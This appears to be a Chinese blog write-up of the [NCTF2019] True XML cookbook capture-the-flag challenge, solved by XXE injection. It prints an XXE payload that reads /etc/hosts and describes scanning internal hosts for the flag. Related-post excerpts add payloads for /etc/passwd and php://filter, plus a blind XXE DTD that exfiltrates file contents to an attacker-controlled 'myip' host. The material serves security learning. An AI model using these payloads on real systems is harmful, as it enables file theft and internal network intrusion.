一天一道ctf 第40天(xxe注入)

最新推荐文章于 2025-09-04 13:59:56 发布
原创 最新推荐文章于 2025-09-04 13:59:56 发布 · 288 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了参与[NCTF2019]TrueXMLcookbook挑战的经历,涉及XML外部实体(XXE)注入技术。通过设置XML实体来读取文件,作者成功获取了/etc/hosts内容,并利用此方法在内网中寻找其他主机,最终在10.0.34.6找到flag。这是一个关于网络安全和XML漏洞利用的学习过程。

[NCTF2019]True XML cookbook
这道题是xml模板和xxe注入,以前没有碰到过类似知识点所以这次学习一下。
在这里插入图片描述
填写用户名,抓包,改包。简单来说就是把file协议读取的内容放在abc这个变量里,然后<username>&abc</username>输出abc的值。

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE a [
 <!ENTITY abc SYSTEM "file:///etc/hosts">
 ]>
<user><username>&abc;</username><password>abc</password></user>

在这里插入图片描述
在这里插入图片描述
我这里并没有拿到主机的IP地址,尝试访问/proc/net/arp,拿到了内网地址
在这里插入图片描述
直接访问这个地址会报错,右键send to Intruder开始爆破IP地址最后一个字段查找内网中的其他主机。最后在10.0.34.6这个地址拿到相应的flag。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

scrawman
关注
CTFSHOW xxe
羽的博客
01-11 3534
web373 payload <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <yu22x> <ctfshow>&xxe;</ctfshow> </yu22x> web374、375、376 payload <!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64
豌豆杯-CTF
weixin_30919919的博客
10-29 1403
目录 wandoucup-ctf web web1-签到题 web2-输入密码查看flag web3-这真能传马? web4-这真能注入? web5-API web6-sweet home web附加题-at...
XML外部实体注入漏洞——XXE简单分析
未完成的歌~的博客
02-01 3370
前言: 前几做了南邮 NJUPT CTF的几道题,感觉自己要学的的东西还有太多!今借着比赛中的一道Web题 来系统的学习下XML外部实体注入(XML External Entity Injection) 题目:Fake XML cookbook 题目:Fake XML cookbook 平台暂时还未关闭,想要复现的抓紧了! 网址:https://nctf.x1c.club/challenges#Web ...
CTFxxe
qq_37410729的博客
10-26 1948
xxe漏洞即我们可以进行外部实体注入,当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 两个writeup 第一题: bp抓包 然后就可以进行xml注入了 这是两种xxe,我们先试第二种(因为源代码并没有标注flag在什么文件中) 然后进内网 然而并进不去,那就只能找存活主机了。 直接暴力寻找 第二题: 按照上题的思路走 但是并没有找到flag。。。。 最后只能去文件里找了,但是题目没有标明具体flag在那个文件,只能试一下/flag文
XXE注入
a3320315的博客
10-28 633
0x01 贴出源地址 Blind XXE详解与Google CTF一道题分析 0x02 贴出常用payload 一、Blind XXE 1、外部DTD (1)先在自己的服务器中加入下列DTD文件 xml.dtd <!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://myip:10001/?%file;'>"...
CTF-[XXE学习记录]
qq_53142368的博客
06-07 1284
1.XXE 关于xml我就不详细说了,想看的话从我之前的文章找找,有关于xml的概念和怎么构造。 XML的设计宗旨是传输数据,而非显示数据。XML是不作为的,XML是不会做任何事情,XML 被设计用来结构化、存储以及传输信息。 XML是纯文本,且允许创作者定义自己的标签和文档结构,是独立于软件和硬件的信息传输工具。 0x01.DTD 文档类型定义(DTD)可定义合法的XML文档构建模块,DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 1.内部的DOCTYPE声明 假如DTD被包含在XML源
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-6
youngerll的博客
01-02 1168
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-6
2025最新CISP考试大纲解析与全流程备考指南,看这一篇就够了!
最新发布
weixin_57514792的博客
09-04 1820
2025最新CISP考试大纲解析与全流程备考指南,看这一篇就够了!
NSSCTF刷题篇web部分
weixin_74427106的博客
10-25 1607
这个源码泄露,可以记录一下,涉及的知识点比较多打开环境查看源码,第一段flag乱码,恢复一下剩下的就只说方法第三段flag就在这里,也是乱码恢复扫出来的目录就是第四段和第六段flag第五段在第四段有提示说和苹果有关系发现第四段flag通过搜索发现苹果和DS_store有关系访问/.DS_store得到第五段flag,和起来就是完全的flag。
细说漏洞挖掘
bluemoon_0的博客
03-13 314
细说漏洞挖掘
CTF学习笔记之XXE
克格莫(有需要的私信)
07-08 1350
一直对XXE理解不是很深入,今仔细研究一下XXE以及CTF里面的XXE题型 0x00 XML基本格式 XML 文档有自己的一个格式规范,这个格式规范是由 DTD控制的。文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 带有 DTD 的 XML 文档实例: <?xml version="1.0"?> <!DOCTYPE note [ <!ELEMENT note (
XML、XXE注入CTF下的XXE
sGanYu
10-27 2379
在学习XXE漏洞之前,首先一起学习一下什么是XML XML是什么? 是种可扩展标记语言,本质上被设计用来传输、存储数据以及结构化,而非显示数据,可以简单理解为不能做任何事的纯文本 常见的XML结构如下: <?xml version="1.0" encoding="utf-8"?>#XML声明 <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)>&
XXE CTF题目
草儿也忧伤的博客
05-14 1946
** XXE CTF题目 **https://www.jianshu.com/p/68d8ae78cc45 直接点链接看吧
ctfshow web入门 XXE
2301_79442654的博客
03-30 1389
XXE(XML External Entity)攻击是一种针对XML处理漏洞的网络安全攻击手段。攻击者利用应用程序在解析XML输入时的漏洞,构造恶意的XML数据,进而实现各种恶意目的。所以要学习xxe就需要了解xml。
CTF-XXE(持续更新,欢迎分享更多相关知识点的题目)
m0_74317362的博客
08-28 1489
进来看到然后一起看。
CTFSHOW—XXE
灰太的表格的博客
01-31 511
(睡了一下午打算,通宵学习hhhh) web373 wa1ki0g标签可以随便改,ctfshow这个不可以。 !DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <wa1ki0g> <ctfshow>&xxe;</ctfshow> </wa1ki0g>
一道CTF针对XXE漏洞的练习
bamanju0574的博客
08-18 2313
题目链接:http://web.jarvisoj.com:9882/ 目的很明确获取/home/ctf/flag.txt的内容 一般读取目标机的本地文件都会用到file协议。 思路: 那么思路一:文件包含; 思路二:ssrf漏洞,这个成功率不大; 思路三:xxe漏洞,再没看源码的情况下试了一下,发现可以。 验证: 访问题目链接 随便输入,输入url发现都没有什么...
【web-ctfctf-pikachu-xxe
一个努力生活的人的博客
08-23 341
ctf-pikachu-xxe
CTF吧-渗透测试靶场-XXE
Demon
11-06 264
CTF8-渗透测试靶场-XXE
CTFXXE注入与XML加密标签的联合利用分析
资源摘要信息:"XML加密漏洞:CTFXXE注入与加密标签的联合利用手法"是一篇系统性探讨在网络安全竞赛(CTF)场景下,XML加密机制与XXE(XML External Entity)注入攻击之间潜在协同威胁的技术文档。文档结构清晰、...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值